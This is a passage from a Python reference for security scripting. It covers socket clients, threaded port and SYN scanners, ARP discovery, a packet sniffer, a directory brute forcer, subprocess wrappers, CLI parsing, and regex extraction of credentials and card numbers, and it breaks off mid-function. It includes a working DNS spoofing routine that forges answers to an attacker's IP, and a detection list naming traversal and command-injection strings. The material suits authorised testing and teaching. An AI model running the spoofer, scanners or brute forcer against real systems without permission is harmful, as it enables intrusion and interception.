Python Reference for Security Scripts
A practical reference for writing security tools and automation scripts in Python. Each section covers a key library or technique with annotated code snippets ready for adaptation.
Table of Contents
- Environment Setup
- Socket Programming
- HTTP Requests (requests / urllib)
- Scapy — Packet Crafting and Sniffing
- Subprocess — Running System Commands
- Argparse — CLI Argument Parsing
- File I/O for Security Scripts
- Regular Expressions (re)
- JSON and XML Parsing
- Cryptography Library
- Paramiko — SSH Automation
- Impacket Basics
- Multithreading and Concurrency
- Error Handling Patterns
- Output Formatting and Logging
- Common Security Script Patterns
1. Environment Setup
Virtual Environment
Always use virtual environments to isolate dependencies:
# Create and activate a virtual environment
python3 -m venv pentest-env
source pentest-env/bin/activate # Linux/macOS
pentest-env\Scripts\activate # Windows
# Install common security libraries
pip install requests scapy paramiko impacket pycryptodome python-nmap
pip install beautifulsoup4 lxml colorama tabulate bcrypt aiohttp
Shebang and Encoding
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script description and usage information.
Author: Your Name
Date: 2025-01-01
"""
Import Organization
# Standard library
import os
import sys
import socket
import struct
import time
import json
import re
import argparse
import logging
import threading
from datetime import datetime
# Third-party
import requests
from scapy.all import *
import paramiko
# Local modules
from utils import format_output
2. Socket Programming
TCP Client
import socket
def tcp_client(target_host, target_port, message=""):
    """Connect over TCP, optionally send a message, and return the first reply.

    Args:
        target_host: Host name or IP address to connect to.
        target_port: TCP port number.
        message: Text to send after connecting; nothing is sent when empty.

    Returns:
        Up to 4096 bytes of the reply decoded as text (undecodable bytes are
        replaced), or a ``"[*] ..."`` status string on timeout / refusal.
    """
    # The context manager closes the socket on every exit path.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.settimeout(5)
        try:
            client.connect((target_host, target_port))
            if message:
                # sendall() keeps writing until the whole payload is sent;
                # send() may stop after a partial write.
                client.sendall(message.encode())
            response = client.recv(4096)
        except socket.timeout:
            return "[*] Connection timed out"
        except ConnectionRefusedError:
            return "[*] Connection refused"
    return response.decode(errors="replace")
# Usage: banner grab
banner = tcp_client("192.168.1.10", 22)
print(f"Banner: {banner}")
TCP Server (Listener)
import socket
import threading
def handle_client(client_socket, addr):
    """Serve one accepted connection: log the peer, read once, reply ``ACK``.

    The socket is always closed before returning, even if reading or
    writing raises.
    """
    peer_ip, peer_port = addr[0], addr[1]
    print(f"[*] Connection from {peer_ip}:{peer_port}")
    try:
        payload = client_socket.recv(4096)
        text = payload.decode(errors='replace')
        print(f"[*] Received: {text}")
        client_socket.send(b"ACK\n")
    finally:
        client_socket.close()
def tcp_server(bind_ip="0.0.0.0", bind_port=9999):
    """Listen for TCP connections and hand each one to ``handle_client``.

    Args:
        bind_ip: Local address to bind (all interfaces by default).
        bind_port: Local TCP port to listen on.

    Runs until interrupted; each connection is served on its own thread.
    """
    # The context manager releases the listening socket when the accept loop
    # is left via an exception such as KeyboardInterrupt.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((bind_ip, bind_port))
        server.listen(5)
        print(f"[*] Listening on {bind_ip}:{bind_port}")
        while True:
            client, addr = server.accept()
            handler = threading.Thread(target=handle_client, args=(client, addr))
            handler.start()
UDP Client
import socket
def udp_client(target_host, target_port, message):
    """Send one UDP datagram and return the decoded reply.

    Returns the status string ``"[*] No response (UDP)"`` when nothing
    arrives within the 3-second timeout.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)
    destination = (target_host, target_port)
    try:
        sock.sendto(message.encode(), destination)
        reply, _sender = sock.recvfrom(4096)
    except socket.timeout:
        return "[*] No response (UDP)"
    else:
        return reply.decode(errors="replace")
    finally:
        sock.close()
Port Scanner
import socket
import threading
from queue import Queue
def port_scan(target, port):
    """Probe a single TCP port and try to read a banner.

    Args:
        target: Host name or IP address.
        port: TCP port number to probe.

    Returns:
        ``(port, is_open, banner)``. ``banner`` is the stripped text read
        right after connecting, or ``""`` if the service stays silent or the
        port is not open. Any failure is reported as a closed port.
    """
    try:
        # Creating the socket inside the `with` means a failed creation is
        # reported as "closed" rather than crashing in a cleanup handler.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(1)
            if sock.connect_ex((target, port)) != 0:
                return (port, False, "")
            try:
                banner = sock.recv(1024).decode(errors="replace").strip()
            except socket.timeout:
                # Open, but the service waits for the client to speak first.
                banner = ""
            return (port, True, banner)
    except Exception:
        # Deliberately best-effort: one bad probe must not abort a scan.
        return (port, False, "")
def threaded_scan(target, ports, max_threads=100):
    """Scan many ports concurrently with ``port_scan``.

    Args:
        target: Host name or IP address.
        ports: Any iterable of port numbers (list, range, generator, ...).
        max_threads: Upper bound on worker threads; values below 1 are
            treated as 1.

    Returns:
        The ``(port, True, banner)`` tuples of the open ports, sorted by port.
    """
    from queue import Empty

    port_list = list(ports)  # allow generators; we need the length below
    results = []
    lock = threading.Lock()
    pending = Queue()
    for port in port_list:
        pending.put(port)

    def worker():
        while True:
            # get_nowait() avoids the empty()/get() race in which another
            # worker takes the last item and this one blocks forever.
            try:
                port = pending.get_nowait()
            except Empty:
                return
            try:
                result = port_scan(target, port)
                if result[1]:  # port is open
                    with lock:
                        results.append(result)
            finally:
                # Always acknowledge the item so join() cannot hang.
                pending.task_done()

    worker_count = min(max(1, max_threads), len(port_list))
    for _ in range(worker_count):
        t = threading.Thread(target=worker)
        t.daemon = True
        t.start()
    pending.join()
    return sorted(results, key=lambda x: x[0])
# Usage
open_ports = threaded_scan("192.168.1.10", range(1, 1025))
for port, is_open, banner in open_ports:
print(f" Port {port:>5}/tcp OPEN {banner}")
Raw Sockets (Linux only)
import socket
import struct
def raw_sniffer(interface="eth0", count=10):
    """Capture and print ``count`` raw Ethernet frames (Linux, requires root).

    Args:
        interface: Accepted for API compatibility; the socket is not bound
            to it here, so capture is not restricted to this interface.
        count: Number of frames to read before returning.

    Prints source/destination MAC and EtherType for every frame and, for
    IPv4 frames, the source/destination address and protocol number.
    """
    eth_len = 14            # dst MAC (6) + src MAC (6) + EtherType (2)
    ipv4_end = eth_len + 20  # fixed part of the IPv4 header

    # The context manager closes the raw socket on every exit path.
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW,
                       socket.ntohs(3)) as raw_sock:
        for i in range(count):
            raw_data, addr = raw_sock.recvfrom(65535)
            if len(raw_data) < eth_len:
                # Too short to hold an Ethernet header; nothing to parse.
                continue
            eth_header = struct.unpack("!6s6sH", raw_data[:eth_len])
            dst_mac = ":".join(f"{b:02x}" for b in eth_header[0])
            src_mac = ":".join(f"{b:02x}" for b in eth_header[1])
            eth_type = eth_header[2]
            print(f"[{i+1}] {src_mac} -> {dst_mac} (Type: 0x{eth_type:04x})")
            # If IPv4 (0x0800) and the fixed 20-byte header is fully present
            if eth_type == 0x0800 and len(raw_data) >= ipv4_end:
                ip_header = struct.unpack("!BBHHHBBH4s4s",
                                          raw_data[eth_len:ipv4_end])
                src_ip = socket.inet_ntoa(ip_header[8])
                dst_ip = socket.inet_ntoa(ip_header[9])
                protocol = ip_header[6]
                print(f" IP: {src_ip} -> {dst_ip} (Proto: {protocol})")
3. HTTP Requests
Basic GET/POST with requests
import requests
from requests.exceptions import RequestException
def web_request(url, method="GET", data=None, headers=None,
                cookies=None, proxy=None, verify=True, timeout=10):
    """Send an HTTP request with a browser-like User-Agent.

    Args:
        url: Target URL.
        method: HTTP verb, case-insensitive. Any verb is accepted.
        data: Request body; ignored for GET.
        headers: Extra headers merged over the default User-Agent.
        cookies: Cookies to send.
        proxy: Single proxy URL used for both http and https.
        verify: TLS certificate verification flag.
        timeout: Timeout in seconds.

    Returns:
        The ``requests.Response``, or ``None`` if the request failed (the
        error is printed).
    """
    proxies = {"http": proxy, "https": proxy} if proxy else None
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                      "AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/120.0.0.0 Safari/537.36"
    }
    if headers:
        request_headers.update(headers)

    verb = method.upper()
    # GET never carried a body here; keep that so existing callers see no change.
    body = None if verb == "GET" else data
    try:
        # requests.request() handles every verb, so an unexpected method no
        # longer falls through to an unbound `resp`.
        return requests.request(verb, url, data=body, headers=request_headers,
                                cookies=cookies, proxies=proxies,
                                verify=verify, timeout=timeout)
    except RequestException as e:
        print(f"[!] Request failed: {e}")
        return None
# Usage
resp = web_request("https://example.com")
# web_request() returns None when the request fails, so check before use.
if resp is not None:
    print(f"Status: {resp.status_code}")
    print(f"Headers: {dict(resp.headers)}")
    print(f"Body length: {len(resp.text)}")
Session Handling
import requests
def authenticated_session(login_url, username, password):
    """Log in via a form POST and return the session on success.

    Success means an HTTP 200 response whose body contains the word
    "logout" (case-insensitive). Returns ``None`` otherwise.
    """
    session = requests.Session()
    credentials = {"username": username, "password": password}
    resp = session.post(login_url, data=credentials)

    logged_in = resp.status_code == 200 and "logout" in resp.text.lower()
    if not logged_in:
        print("[-] Authentication failed")
        return None

    print("[+] Authentication successful")
    return session
# Usage
session = authenticated_session(
"http://target.com/login",
"admin",
"password123"
)
if session:
# Authenticated requests
dashboard = session.get("http://target.com/dashboard")
Directory Brute Forcer
import requests
from concurrent.futures import ThreadPoolExecutor
def dir_brute(target_url, wordlist_path, extensions=None, threads=20):
    """Request candidate paths on a web server and report those that exist.

    Args:
        target_url: Base URL; a trailing slash is ignored.
        wordlist_path: File with one candidate path per line.
        extensions: Suffixes appended to each word (e.g. ``[".php"]``);
            defaults to trying the bare word only.
        threads: Size of the worker thread pool.

    Returns:
        A list of ``(status_code, url, content_length)`` for every response
        whose status is neither 404 nor 403.
    """
    extensions = extensions or [""]
    found = []
    # Wordlists often contain non-UTF-8 bytes; replace them instead of
    # aborting the whole run with UnicodeDecodeError.
    with open(wordlist_path, "r", encoding="utf-8", errors="replace") as f:
        words = [line.strip() for line in f if line.strip()]

    base_url = target_url.rstrip('/')

    def check_path(word):
        for ext in extensions:
            path = f"{word}{ext}" if ext else word
            url = f"{base_url}/{path}"
            try:
                resp = requests.get(url, timeout=5, allow_redirects=False)
            except requests.RequestException:
                # Best-effort: an unreachable path is simply skipped.
                continue
            if resp.status_code not in [404, 403]:
                result = f"[{resp.status_code}] {url} (Size: {len(resp.content)})"
                print(result)
                found.append((resp.status_code, url, len(resp.content)))

    with ThreadPoolExecutor(max_workers=threads) as executor:
        executor.map(check_path, words)
    return found
Handling Proxies (Burp Suite Integration)
import requests
import urllib3
# Suppress InsecureRequestWarning when using Burp
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BURP_PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# All traffic routes through Burp Suite
resp = requests.get(
"https://target.com/api/users",
proxies=BURP_PROXY,
verify=False # Required for Burp's self-signed cert
)
4. Scapy — Packet Crafting and Sniffing
Basic Packet Construction
from scapy.all import *
# Build an ICMP echo request (ping)
packet = IP(dst="192.168.1.1") / ICMP()
response = sr1(packet, timeout=2, verbose=0)
if response:
print(f"[+] {response.src} is alive (TTL: {response.ttl})")
# Build a TCP SYN packet
syn_packet = IP(dst="192.168.1.10") / TCP(dport=80, flags="S")
response = sr1(syn_packet, timeout=2, verbose=0)
if response and response.haslayer(TCP):
if response[TCP].flags == 0x12: # SYN-ACK
print("[+] Port 80 is OPEN")
elif response[TCP].flags == 0x14: # RST-ACK
print("[-] Port 80 is CLOSED")
SYN Scanner
from scapy.all import *
def syn_scan(target, ports):
    """Perform a SYN scan using Scapy (requires root).

    Args:
        target: Destination IP address or host name.
        ports: Iterable of TCP ports to probe.

    Returns:
        The list of ports that answered with SYN-ACK.
    """
    open_ports = []
    for port in ports:
        pkt = IP(dst=target) / TCP(dport=port, flags="S")
        resp = sr1(pkt, timeout=1, verbose=0)
        if resp is None or not resp.haslayer(TCP):
            continue
        if resp[TCP].flags == 0x12:  # SYN-ACK
            open_ports.append(port)
            # Send RST to close (be polite). The reset has to come from the
            # port the SYN-ACK was addressed to and carry the sequence number
            # the peer acknowledged, otherwise the peer ignores it.
            rst = IP(dst=target) / TCP(sport=resp[TCP].dport, dport=port,
                                       flags="R", seq=resp[TCP].ack)
            send(rst, verbose=0)
    return open_ports
# Usage
results = syn_scan("192.168.1.10", [21, 22, 80, 443, 445, 3389])
print(f"Open ports: {results}")
ARP Scanner (Network Discovery)
from scapy.all import *
def arp_scan(network):
    """Broadcast ARP requests for ``network`` and list the hosts that reply.

    Returns a list of ``{"ip": ..., "mac": ...}`` dicts, one per answer.
    """
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network)
    replies, _unanswered = srp(probe, timeout=2, verbose=0)
    return [
        {"ip": reply.psrc, "mac": reply.hwsrc}
        for _request, reply in replies
    ]
# Usage
hosts = arp_scan("192.168.1.0/24")
for host in hosts:
print(f" {host['ip']:>15} {host['mac']}")
Packet Sniffer
from scapy.all import *
from datetime import datetime
def packet_callback(packet):
    """Print a one-line summary of each captured TCP or UDP packet.

    For TCP packets carrying a payload that looks like HTTP, the first 100
    characters of the payload are printed as well. Packets without an IP
    layer are ignored.
    """
    # The lines below index packet[IP]; skip frames that have no such layer
    # (for example IPv6) instead of raising inside the sniffer.
    if not packet.haslayer(IP):
        return

    timestamp = datetime.now().strftime("%H:%M:%S")
    if packet.haslayer(TCP):
        src = f"{packet[IP].src}:{packet[TCP].sport}"
        dst = f"{packet[IP].dst}:{packet[TCP].dport}"
        flags = packet[TCP].flags
        print(f"[{timestamp}] TCP {src} -> {dst} [{flags}]")
        # Check for HTTP data
        if packet.haslayer(Raw):
            payload = packet[Raw].load.decode(errors="replace")
            if "HTTP" in payload or "GET" in payload or "POST" in payload:
                print(f" HTTP: {payload[:100]}")
    elif packet.haslayer(UDP):
        src = f"{packet[IP].src}:{packet[UDP].sport}"
        dst = f"{packet[IP].dst}:{packet[UDP].dport}"
        print(f"[{timestamp}] UDP {src} -> {dst}")
# Usage: sniff HTTP traffic
sniff(filter="tcp port 80", prn=packet_callback, count=50)
DNS Spoofing Example
from scapy.all import *
def dns_spoof(packet):
    """Answer a sniffed DNS question with a fixed address.

    Lab demonstration only; use exclusively on networks you are authorised
    to test. Packets without a DNS question record are ignored.
    """
    if not packet.haslayer(DNSQR):
        return

    queried_domain = packet[DNSQR].qname.decode()
    spoofed_ip = "192.168.1.100"  # Attacker's IP

    # Mirror the addressing of the query so the answer goes back to the asker.
    ip_layer = IP(dst=packet[IP].src, src=packet[IP].dst)
    udp_layer = UDP(dport=packet[UDP].sport, sport=53)
    dns_layer = DNS(
        id=packet[DNS].id,
        qr=1, aa=1, qd=packet[DNS].qd,
        an=DNSRR(rrname=queried_domain, ttl=300, rdata=spoofed_ip)
    )
    spoofed_pkt = ip_layer / udp_layer / dns_layer

    send(spoofed_pkt, verbose=0)
    print(f"[*] Spoofed {queried_domain} -> {spoofed_ip}")
# Usage (requires ARP spoofing or network position)
sniff(filter="udp port 53", prn=dns_spoof)
5. Subprocess — Running System Commands
Safe Command Execution
import subprocess
import shlex
def run_command(command, timeout=30):
    """Run a command line without a shell and capture its output.

    Args:
        command: Command line as a single string; it is tokenised with
            ``shlex.split`` and executed directly (no shell involved).
        timeout: Seconds to wait before giving up.

    Returns:
        ``{"stdout": str, "stderr": str, "returncode": int}``. A
        ``returncode`` of -1 with an explanatory ``stderr`` is used for an
        empty command, a timeout, or a missing executable.
    """
    # Use shlex.split for safe argument parsing
    args = shlex.split(command)
    if not args:
        # subprocess would raise IndexError on an empty argument list.
        return {"stdout": "", "stderr": "Empty command", "returncode": -1}
    try:
        result = subprocess.run(
            args,
            capture_output=True,
            text=True,
            timeout=timeout
        )
    except subprocess.TimeoutExpired:
        return {"stdout": "", "stderr": "Command timed out", "returncode": -1}
    except FileNotFoundError:
        return {"stdout": "", "stderr": "Command not found", "returncode": -1}
    return {
        "stdout": result.stdout,
        "stderr": result.stderr,
        "returncode": result.returncode
    }
# Usage
result = run_command("nmap -sV -p 80,443 192.168.1.10")
print(result["stdout"])
Running Nmap from Python
import subprocess
import xml.etree.ElementTree as ET
def nmap_scan(target, arguments="-sV -sC"):
    """Run Nmap with XML output on stdout and parse the result.

    Args:
        target: Target specification passed to nmap.
        arguments: Extra nmap options as one string.

    Returns:
        A list of ``{"ip": str, "ports": [...]}`` dicts, where each port is
        ``{"port", "protocol", "state", "service", "version"}``; ``None``
        if nmap exits with a non-zero status.
    """
    # Imported locally so this snippet works on its own.
    import shlex

    cmd = f"nmap {arguments} -oX - {target}"
    result = subprocess.run(
        shlex.split(cmd),
        capture_output=True, text=True, timeout=300
    )
    if result.returncode != 0:
        print(f"[!] Nmap error: {result.stderr}")
        return None

    # Parse XML output
    root = ET.fromstring(result.stdout)
    hosts = []
    for host in root.findall("host"):
        address = host.find("address")
        addr = address.get("addr") if address is not None else None
        ports = []
        for port in host.findall(".//port"):
            # <state> and <service> may be absent for a port; fall back to
            # defaults rather than calling .get() on None.
            state = port.find("state")
            service = port.find("service")
            ports.append({
                "port": port.get("portid"),
                "protocol": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "service": service.get("name", "unknown") if service is not None else "unknown",
                "version": service.get("product", "") if service is not None else "",
            })
        hosts.append({"ip": addr, "ports": ports})
    return hosts
Piping Between Commands
import subprocess
def pipe_commands(cmd1, cmd2):
    """Run ``cmd1 | cmd2`` without a shell and return cmd2's stdout as text.

    Args:
        cmd1: Producer command line (tokenised with ``shlex.split``).
        cmd2: Consumer command line (tokenised with ``shlex.split``).
    """
    # Imported locally so this snippet works on its own.
    import shlex

    p1 = subprocess.Popen(
        shlex.split(cmd1),
        stdout=subprocess.PIPE
    )
    try:
        p2 = subprocess.Popen(
            shlex.split(cmd2),
            stdin=p1.stdout,
            stdout=subprocess.PIPE,
            text=True
        )
    except Exception:
        # The consumer failed to start: do not leave the producer running.
        p1.stdout.close()
        p1.kill()
        p1.wait()
        raise
    # Close our copy of the pipe so p1 gets SIGPIPE if p2 exits early.
    p1.stdout.close()
    output, _ = p2.communicate()
    p1.wait()  # reap the producer so it does not linger as a zombie
    return output
# Example: grep specific lines from nmap output
result = pipe_commands(
"nmap -sV 192.168.1.0/24",
"grep 'open'"
)
6. Argparse — CLI Argument Parsing
Professional CLI Tool Template
#!/usr/bin/env python3
"""
Security Tool Template
Usage: python3 tool.py -t TARGET -p PORTS [options]
"""
import argparse
import sys
def parse_args():
    """Build the scanner's command-line interface and parse ``sys.argv``.

    Returns the ``argparse.Namespace`` with ``target``, ``ports``,
    ``output``, ``format``, ``threads``, ``timeout``, ``verbose`` and
    ``quiet``.
    """
    cli = argparse.ArgumentParser(
        description="Network Security Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
%(prog)s -t 192.168.1.10 -p 1-1024
%(prog)s -t 10.0.0.0/24 -p 80,443,8080 --threads 50
%(prog)s -t targets.txt -p top100 -o results.json
"""
    )

    # (flags, add_argument keyword settings), registered in this order.
    option_specs = [
        # Required arguments
        (("-t", "--target"),
         {"required": True, "help": "Target IP, range, CIDR, or file"}),
        (("-p", "--ports"),
         {"required": True,
          "help": "Port(s): single, range (1-1024), "
                  "comma-separated, or 'top100'"}),
        # Optional arguments
        (("-o", "--output"), {"help": "Output file path"}),
        (("-f", "--format"),
         {"choices": ["text", "json", "csv"], "default": "text",
          "help": "Output format (default: text)"}),
        (("--threads",),
         {"type": int, "default": 10,
          "help": "Number of threads (default: 10)"}),
        (("--timeout",),
         {"type": float, "default": 2.0,
          "help": "Connection timeout in seconds (default: 2.0)"}),
        (("-v", "--verbose"),
         {"action": "count", "default": 0,
          "help": "Increase verbosity (-v, -vv, -vvv)"}),
        (("-q", "--quiet"),
         {"action": "store_true",
          "help": "Suppress banner and status messages"}),
    ]
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()
def parse_ports(port_string):
    """Parse a port specification into a sorted list of unique integers.

    Accepted comma-separated parts (surrounding whitespace is ignored and
    empty parts are skipped):

    * a single port, e.g. ``80``
    * an inclusive range, e.g. ``1-1024`` (reversed bounds are swapped)
    * the keyword ``top100`` (case-insensitive), a built-in list of
      commonly used ports

    Raises:
        ValueError: if a part is not numeric or a port is outside 0-65535.
    """
    common_ports = [21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443,
                    445, 993, 995, 1723, 3306, 3389, 5900, 8080]

    def _checked(value):
        # Validate before expanding so a typo cannot build a huge range.
        number = int(value)
        if not 0 <= number <= 65535:
            raise ValueError(f"port out of range (0-65535): {number}")
        return number

    ports = set()
    for raw_part in port_string.split(","):
        part = raw_part.strip()
        if not part:
            continue  # tolerate "80,,443" and trailing commas
        if part.lower() == "top100":
            ports.update(common_ports)
        elif "-" in part:
            start_text, end_text = part.split("-", 1)
            start, end = _checked(start_text), _checked(end_text)
            if start > end:
                start, end = end, start
            ports.update(range(start, end + 1))
        else:
            ports.add(_checked(part))
    return sorted(ports)
if __name__ == "__main__":
args = parse_args()
ports = parse_ports(args.ports)
# ... rest of the tool logic
7. File I/O for Security Scripts
Reading Wordlists and Target Files
def load_wordlist(filepath):
    """Return the non-blank, non-comment lines of a wordlist file.

    Lines are stripped of surrounding whitespace; lines starting with ``#``
    are treated as comments. Undecodable bytes are replaced, not fatal.
    """
    with open(filepath, "r", encoding="utf-8", errors="replace") as handle:
        stripped = (raw.strip() for raw in handle)
        return [entry for entry in stripped
                if entry and not entry.startswith("#")]
def load_targets(filepath):
    """Read scan targets from a file, one entry per line.

    Entries that parse as an IP network (CIDR) are expanded to their host
    addresses; anything else is kept verbatim as a host name. Blank lines
    and lines starting with ``#`` are skipped.
    """
    import ipaddress

    collected = []
    with open(filepath, "r") as handle:
        for raw in handle:
            entry = raw.strip()
            if entry == "" or entry.startswith("#"):
                continue
            try:
                # Try as network (CIDR)
                net = ipaddress.ip_network(entry, strict=False)
            except ValueError:
                # Treat as hostname
                collected.append(entry)
            else:
                collected.extend(str(ip) for ip in net.hosts())
    return collected
Writing Structured Output
import json
import csv
from datetime import datetime
def write_results(results, output_path, fmt="json"):
    """Write scan results to ``output_path`` in the requested format.

    Args:
        results: List of result records. CSV output expects dict records.
        output_path: Destination file path.
        fmt: ``"json"``, ``"csv"`` or ``"text"``.

    Raises:
        ValueError: if ``fmt`` is not one of the supported formats.

    CSV output with an empty ``results`` writes nothing and returns
    silently.
    """
    if fmt not in ("json", "csv", "text"):
        # Previously an unknown format wrote nothing yet reported success.
        raise ValueError(f"Unsupported output format: {fmt!r}")

    if fmt == "json":
        with open(output_path, "w") as f:
            json.dump({
                "scan_date": datetime.now().isoformat(),
                "results": results
            }, f, indent=2)
    elif fmt == "csv":
        if not results:
            return
        # Union of all keys in first-seen order, so rows with extra or
        # missing fields do not make DictWriter raise.
        fieldnames = list(dict.fromkeys(key for row in results for key in row))
        with open(output_path, "w", newline="") as f:
            writer = csv.DictWriter(f, fieldnames=fieldnames)
            writer.writeheader()
            writer.writerows(results)
    else:  # "text"
        with open(output_path, "w") as f:
            f.writelines(f"{r}\n" for r in results)
    print(f"[+] Results written to {output_path}")
Binary File Handling
def read_binary_file(filepath):
    """Return the entire content of ``filepath`` as ``bytes``."""
    with open(filepath, "rb") as handle:
        content = handle.read()
    return content
def hexdump(data, length=16):
    """Render ``data`` as hex-dump text, ``length`` bytes per row.

    Each row shows the 8-digit hex offset, the bytes as two-digit hex
    values, and the printable-ASCII view (``.`` for everything else).
    Rows are joined with newlines; empty input yields an empty string.
    """
    def _row(offset):
        piece = data[offset:offset + length]
        hex_cols = " ".join(f"{byte:02x}" for byte in piece)
        printable = "".join(
            chr(byte) if 32 <= byte < 127 else "." for byte in piece
        )
        return f"{offset:08x} {hex_cols:<{length*3}} |{printable}|"

    return "\n".join(_row(offset) for offset in range(0, len(data), length))
# Usage
data = read_binary_file("/path/to/binary")
print(hexdump(data[:256]))
8. Regular Expressions (re)
Common Security Patterns
import re
# IP Address extraction
# Dotted-quad IPv4 where every octet is limited to 0-255; word boundaries
# keep it from matching inside longer digit runs.
IP_PATTERN = re.compile(
r'\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}'
r'(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\b'
)
# Email extraction
# Pragmatic local@domain.tld shape; not a full RFC 5322 validator.
EMAIL_PATTERN = re.compile(
r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
)
# URL extraction
# Either an http(s):// URL or a bare "www." host, running up to the next
# whitespace, angle bracket or quote character.
URL_PATTERN = re.compile(
r'https?://[^\s<>"\']+|www\.[^\s<>"\']+'
)
# Hash detection
# These match on length only (32 / 40 / 64 hex digits), so any hex token of
# that length is reported, whichever algorithm actually produced it.
MD5_PATTERN = re.compile(r'\b[a-fA-F0-9]{32}\b')
SHA1_PATTERN = re.compile(r'\b[a-fA-F0-9]{40}\b')
SHA256_PATTERN = re.compile(r'\b[a-fA-F0-9]{64}\b')
# Password pattern in source code
# Case-insensitive "<keyword> = '<value>'" / "<keyword>: \"<value>\"" shapes;
# the single capture group is the quoted value.
PASSWORD_PATTERNS = re.compile(
r'(?:password|passwd|pwd|secret|api_key|apikey|token|auth)'
r'\s*[=:]\s*["\']([^"\']+)["\']',
re.IGNORECASE
)
# Credit card patterns
# 13-16 digits, each optionally followed by spaces or hyphens. No checksum
# validation is done, so expect false positives on other long numbers.
CC_PATTERN = re.compile(
r'\b(?:\d[ -]*?){13,16}\b'
)
# Base64-encoded strings
# Runs of at least 20 Base64-alphabet characters with optional "=" padding.
BASE64_PATTERN = re.compile(
r'[A-Za-z0-9+/]{20,}={0,2}'
)
def extract_all(text):
    """Run every artifact pattern over ``text``.

    Returns a dict mapping category name to the list of matches found by
    the corresponding module-level pattern.
    """
    sources = (
        ("ips", IP_PATTERN),
        ("emails", EMAIL_PATTERN),
        ("urls", URL_PATTERN),
        ("md5_hashes", MD5_PATTERN),
        ("sha1_hashes", SHA1_PATTERN),
        ("sha256_hashes", SHA256_PATTERN),
        ("passwords", PASSWORD_PATTERNS),
        ("base64_strings", BASE64_PATTERN),
    )
    return {label: pattern.findall(text) for label, pattern in sources}
# Usage
with open("logfile.txt") as f:
artifacts = extract_all(f.read())
for category, items in artifacts.items():
if items:
print(f"\n{category}: {len(items)} found")
for item in items[:5]:
print(f" {item}")
Log File Parsing
import re
from collections import Counter
# Apache access log pattern
# Named groups: ip, timestamp, method, path, status, size.
APACHE_LOG = re.compile(
    r'(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<timestamp>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\S+)'
)


def parse_access_log(filepath):
    """Parse an Apache/Nginx access log and flag suspicious activity.

    Args:
        filepath: Path to the access log.

    Returns:
        A dict with:
        * ``"top_ips"``: the 20 most frequent client IPs as ``(ip, count)``
        * ``"suspicious_requests"``: ``(ip, path, status)`` for requests
          whose path contains an injection / traversal keyword
        * ``"failed_logins"``: ``(ip, path)`` for 401/403 responses on
          paths containing "login"

    Lines that do not match the log pattern are ignored.
    """
    ip_counter = Counter()
    failed_logins = []
    suspicious_paths = []
    suspicious_keywords = [
        "union", "select", "../../", "etc/passwd",
        "<script", "cmd.exe", "eval(", "system("
    ]
    # Logs routinely contain attacker-supplied bytes that are not valid
    # text; replace them instead of aborting the whole parse.
    with open(filepath, errors="replace") as f:
        for line in f:
            match = APACHE_LOG.match(line)
            if not match:
                continue
            ip = match.group("ip")
            path = match.group("path")
            status = match.group("status")
            ip_counter[ip] += 1

            # Check for SQL injection / traversal attempts
            path_lower = path.lower()
            if any(keyword in path_lower for keyword in suspicious_keywords):
                suspicious_paths.append((ip, path, status))

            # Check for authentication failures
            if status in ["401", "403"] and "login" in path_lower:
                failed_logins.append((ip, path))
    return {
        "top_ips": ip_counter.most_common(20),
        "suspicious_requests": suspicious_paths,
        "failed_logins": failed_logins
    }
9. JSON and XML Parsing
JSON (API Responses)
import json
# Parse API response
def parse_api_response(response_text):
    """Decode a JSON API response and return its ``"results"`` entry.

    Returns ``None`` (after printing the error) when the text is not valid
    JSON, and ``[]`` when the document has no ``"results"`` key or is not
    a JSON object.
    """
    try:
        data = json.loads(response_text)
    except json.JSONDecodeError as e:
        print(f"[!] Invalid JSON: {e}")
        return None

    # Navigate nested structures safely
    def safe_get(d, *keys, default=None):
        node = d
        for key in keys:
            if isinstance(node, dict):
                node = node.get(key, default)
                continue
            if isinstance(node, list) and isinstance(key, int):
                node = node[key] if key < len(node) else default
                continue
            # Neither a mapping nor an indexable list: cannot descend.
            return default
        return node

    # Example: extract user data
    return safe_get(data, "results", default=[])
# Pretty-print JSON for analysis
def print_json(data):
    """Print ``data`` as 2-space-indented JSON.

    Values that JSON cannot encode natively are rendered with ``str()``.
    """
    rendered = json.dumps(data, indent=2, default=str)
    print(rendered)
XML (Nmap Output, SAML, SOAP)
import xml.etree.ElementTree as ET
def parse_nmap_xml(xml_file):
    """Parse an Nmap XML report into a list of host dicts.

    Each host is ``{"ip", "state", "ports"}``; each port is ``{"port",
    "protocol", "state", "service", "product", "version"}`` plus a
    ``"scripts"`` dict (script id -> output) when the port has script
    results. Missing service details become empty strings.
    """
    def _service_attr(node, attribute):
        # A port without a <service> element yields empty strings.
        return node.get(attribute, "") if node is not None else ""

    report_root = ET.parse(xml_file).getroot()
    parsed_hosts = []
    for host_el in report_root.findall("host"):
        entry = {
            "ip": host_el.find("address").get("addr"),
            "state": host_el.find("status").get("state"),
            "ports": []
        }
        for port_el in host_el.findall(".//port"):
            svc = port_el.find("service")
            record = {
                "port": int(port_el.get("portid")),
                "protocol": port_el.get("protocol"),
